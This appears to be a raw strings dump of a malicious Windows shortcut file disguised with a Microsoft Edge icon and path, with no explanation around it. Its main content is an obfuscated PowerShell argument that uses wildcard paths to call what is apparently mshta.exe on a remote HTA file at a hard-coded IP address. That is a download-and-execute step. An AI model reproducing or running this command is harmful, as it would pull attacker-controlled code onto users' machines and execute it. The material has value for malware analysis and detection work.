Windows
System32
WindowsPowerShell
powershell.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
Windows
System32
WindowsPowerShell
powershell.exe
B..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe<. C:\*i*\S*2\?sht*xe ('http' + '://141.98.6.99/thomas.hta')<C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
S-1-5-21-3880082735-2511442530-2285471707-1001